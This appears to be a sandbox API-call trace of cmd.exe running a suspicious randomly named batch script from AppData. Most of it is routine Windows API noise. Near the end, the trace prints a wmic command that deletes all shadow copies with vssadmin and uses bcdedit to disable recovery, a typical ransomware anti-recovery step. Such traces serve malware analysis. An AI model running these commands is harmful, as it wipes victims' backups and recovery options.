lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.534] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0117.534] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0117.534] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0117.534] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0117.535] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0117.535] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0117.535] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0117.535] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0117.535] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0117.535] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0117.535] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x28f254 | out: _Buffer="CiOHhXJTCFVtKQz1Zuv\r\n") returned 21 [0117.535] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.535] GetFileType (hFile=0x7) returned 0x2 [0117.535] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.535] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f214 | out: lpMode=0x28f214) returned 1 [0117.535] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.535] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x28f240, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f240*=0x15) returned 1 [0117.535] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.535] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0117.536] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.536] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0117.536] _get_osfhandle (_FileHandle=0) returned 0x3 [0117.536] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0117.536] SetConsoleInputExeNameW () returned 0x1 [0117.536] GetConsoleOutputCP () returned 0x1b5 [0117.536] 
GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0117.536] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.536] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0117.536] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0117.536] _get_osfhandle (_FileHandle=3) returned 0x58 [0117.536] SetFilePointer (in: hFile=0x58, lDistanceToMove=26, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a [0117.537] _get_osfhandle (_FileHandle=3) returned 0x58 [0117.537] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a [0117.537] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x222, lpOverlapped=0x0) returned 1 [0117.537] SetFilePointer (in: hFile=0x58, lDistanceToMove=48, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x30 [0117.537] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=22, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="ping -n 30 localhost\r\nuv\r\n") returned 22 [0117.537] _get_osfhandle (_FileHandle=3) returned 0x58 [0117.537] GetFileType (hFile=0x58) returned 0x1 [0117.537] _get_osfhandle (_FileHandle=3) returned 0x58 [0117.537] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x30 [0117.538] _tell (_FileHandle=3) returned 48 [0117.538] _close (_FileHandle=3) returned 0 [0117.538] 
_vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f47c | out: _Buffer="\r\n") returned 2 [0117.538] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.538] GetFileType (hFile=0x7) returned 0x2 [0117.538] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.538] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f43c | out: lpMode=0x28f43c) returned 1 [0117.538] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.538] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f468*=0x2) returned 1 [0117.538] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.538] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0117.538] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f478 | out: _Buffer=">") returned 1 [0117.538] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.538] GetFileType (hFile=0x7) returned 0x2 [0117.539] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.539] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f440 | out: lpMode=0x28f440) returned 1 [0117.539] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.539] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f46c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f46c*=0x19) returned 1 [0117.539] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.539] GetFileType (hFile=0x7) returned 0x2 [0117.539] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.539] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6c4 | out: lpMode=0x28f6c4) returned 1 [0117.539] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.539] WriteConsoleW (in: 
hConsoleOutput=0x7, lpBuffer=0x490958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x28f6f0, lpReserved=0x0 | out: lpBuffer=0x490958*, lpNumberOfCharsWritten=0x28f6f0*=0x4) returned 1 [0117.539] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f6fc | out: _Buffer=" -n 30 localhost ") returned 17 [0117.539] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.539] GetFileType (hFile=0x7) returned 0x2 [0117.540] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.540] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6bc | out: lpMode=0x28f6bc) returned 1 [0117.540] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.540] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x28f6e8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6e8*=0x11) returned 1 [0117.540] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f71c | out: _Buffer="\r\n") returned 2 [0117.540] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.540] GetFileType (hFile=0x7) returned 0x2 [0117.540] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.540] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6dc | out: lpMode=0x28f6dc) returned 1 [0117.540] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.540] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f708, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f708*=0x2) returned 1 [0117.540] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0117.540] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0117.540] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0117.540] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0117.541] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0117.541] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0117.541] _wcsicmp 
(_String1="ping", _String2="CHDIR") returned 13 [0117.541] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0117.541] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0117.541] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0117.541] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0117.541] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0117.541] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0117.541] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0117.541] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0117.541] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0117.541] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0117.541] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0117.541] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0117.541] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0117.541] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0117.541] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0117.541] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0117.541] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0117.541] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0117.541] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0117.541] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0117.541] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0117.541] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0117.541] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0117.541] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0117.541] _wcsicmp (_String1="ping", _String2="START") returned -3 [0117.541] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0117.541] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0117.541] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0117.541] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 
[0117.541] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0117.541] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0117.541] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0117.541] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0117.541] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0117.541] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0117.541] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0117.541] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0117.542] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.542] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0117.542] GetLastError () returned 0x2 [0117.542] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0117.542] GetLastError () returned 0x2 [0117.542] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0x4a0870 [0117.542] FindClose (in: hFindFile=0x4a0870 | out: hFindFile=0x4a0870) returned 1 [0117.542] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0117.542] GetLastError 
() returned 0x2 [0117.542] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0x4a0870 [0117.543] FindClose (in: hFindFile=0x4a0870 | out: hFindFile=0x4a0870) returned 1 [0117.543] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0117.543] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0117.543] GetConsoleTitleW (in: lpConsoleTitle=0x28f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.543] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0117.543] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0117.543] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.543] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0117.543] GetLastError () returned 0x2 [0117.543] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0117.543] GetLastError () returned 0x2 [0117.543] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0x4a0db8 [0117.543] FindClose (in: hFindFile=0x4a0db8 | out: hFindFile=0x4a0db8) returned 1 [0117.544] FindFirstFileExW (in: 
lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0117.544] GetLastError () returned 0x2 [0117.544] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0x4a0db8 [0117.544] FindClose (in: hFindFile=0x4a0db8 | out: hFindFile=0x4a0db8) returned 1 [0117.544] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0117.544] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0117.544] GetConsoleTitleW (in: lpConsoleTitle=0x28f020, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.544] InitializeProcThreadAttributeList (in: lpAttributeList=0x28eea8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28ef70 | out: lpAttributeList=0x28eea8, lpSize=0x28ef70) returned 1 [0117.544] UpdateProcThreadAttribute (in: lpAttributeList=0x28eea8, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ef68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28eea8, lpPreviousValue=0x0) returned 1 [0117.544] GetStartupInfoW (in: lpStartupInfo=0x28ee64 | out: lpStartupInfo=0x28ee64*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0117.544] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0117.545] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 30 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, 
lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28ef04*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 30 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28ef50 | out: lpCommandLine="ping -n 30 localhost", lpProcessInformation=0x28ef50*(hProcess=0x54, hThread=0x58, dwProcessId=0xed0, dwThreadId=0xed4)) returned 1 [0117.698] CloseHandle (hObject=0x58) returned 1 [0117.698] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0117.698] GetEnvironmentStringsW () returned 0x490970* [0117.698] FreeEnvironmentStringsW (penv=0x490970) returned 1 [0117.698] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0159.089] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x28ee44 | out: lpExitCode=0x28ee44*=0x0) returned 1 [0159.089] CloseHandle (hObject=0x54) returned 1 [0159.089] _vsnwprintf (in: _Buffer=0x28ef8c, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ee50 | out: _Buffer="00000000") returned 8 [0159.089] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0159.089] GetEnvironmentStringsW () returned 0x492c28* [0159.090] FreeEnvironmentStringsW (penv=0x492c28) returned 1 [0159.090] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0159.090] GetEnvironmentStringsW () returned 0x492c28* [0159.090] FreeEnvironmentStringsW (penv=0x492c28) returned 1 [0159.090] DeleteProcThreadAttributeList (in: lpAttributeList=0x28eea8 | out: lpAttributeList=0x28eea8) [0159.090] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.090] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0159.090] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.090] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 
[0159.090] _get_osfhandle (_FileHandle=0) returned 0x3 [0159.090] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0159.090] SetConsoleInputExeNameW () returned 0x1 [0159.090] GetConsoleOutputCP () returned 0x1b5 [0159.090] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0159.090] SetThreadUILanguage (LangId=0x0) returned 0x409 [0159.091] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0159.091] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0159.091] _get_osfhandle (_FileHandle=3) returned 0x54 [0159.091] SetFilePointer (in: hFile=0x54, lDistanceToMove=48, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x30 [0159.092] _get_osfhandle (_FileHandle=3) returned 0x54 [0159.092] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x30 [0159.092] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x20c, lpOverlapped=0x0) returned 1 [0159.093] SetFilePointer (in: hFile=0x54, lDistanceToMove=243, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf3 [0159.093] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=195, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="wmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy 
ignoreallfailures\"\r\n") returned 195 [0159.093] _get_osfhandle (_FileHandle=3) returned 0x54 [0159.093] GetFileType (hFile=0x54) returned 0x1 [0159.093] _get_osfhandle (_FileHandle=3) returned 0x54 [0159.093] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf3 [0159.096] _tell (_FileHandle=3) returned 243 [0159.096] _close (_FileHandle=3) returned 0 [0159.096] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f47c | out: _Buffer="\r\n") returned 2 [0159.096] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.096] GetFileType (hFile=0x7) returned 0x2 [0159.097] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0159.097] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f43c | out: lpMode=0x28f43c) returned 1 [0159.097] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.097] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f468*=0x2) returned 1 [0159.097] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0159.097] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0159.097] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0159.097] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f478 | out: _Buffer=">") returned 1 [0159.097] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.098] GetFileType (hFile=0x7) returned 0x2 [0159.098] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0159.098] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f440 | out: lpMode=0x28f440) returned 1 [0159.098] _get_osfhandle (_FileHandle=1) returned 
0x7 [0159.098] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f46c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f46c*=0x19) returned 1 [0159.098] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.098] GetFileType (hFile=0x7) returned 0x2 [0159.098] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0159.098] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6c4 | out: lpMode=0x28f6c4) returned 1 [0159.098] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.098] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x48eb68*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x28f6f0, lpReserved=0x0 | out: lpBuffer=0x48eb68*, lpNumberOfCharsWritten=0x28f6f0*=0x8) returned 1 [0159.099] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f6fc | out: _Buffer=" process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\" ") returned 186 [0159.099] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.099] GetFileType (hFile=0x7) returned 0x2 [0159.099] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0159.099] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6bc | out: lpMode=0x28f6bc) returned 1 [0159.099] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.099] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0xba, lpNumberOfCharsWritten=0x28f6e8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6e8*=0xba) returned 1 [0159.099] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f71c | out: _Buffer="\r\n") returned 2 [0159.099] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.099] GetFileType (hFile=0x7) returned 0x2 [0159.100] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0159.100] GetConsoleMode (in: hConsoleHandle=0x7, 
lpMode=0x28f6dc | out: lpMode=0x28f6dc) returned 1 [0159.100] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.100] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f708, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f708*=0x2) returned 1 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="DIR") returned 19 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="ERASE") returned 18 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="DEL") returned 19 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="TYPE") returned 3 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="COPY") returned 20 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="CD") returned 20 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="CHDIR") returned 20 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="RENAME") returned 5 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="REN") returned 5 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="ECHO") returned 18 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="SET") returned 4 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="PAUSE") returned 7 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="DATE") returned 19 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="TIME") returned 3 [0159.100] _wcsicmp (_String1="wmic.exe", _String2="PROMPT") returned 7 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="MD") returned 10 [0159.101] _wcsicmp (_String1="wmic.exe", _String2="MKDIR") returned 10 [0159.101] _wcsicmp 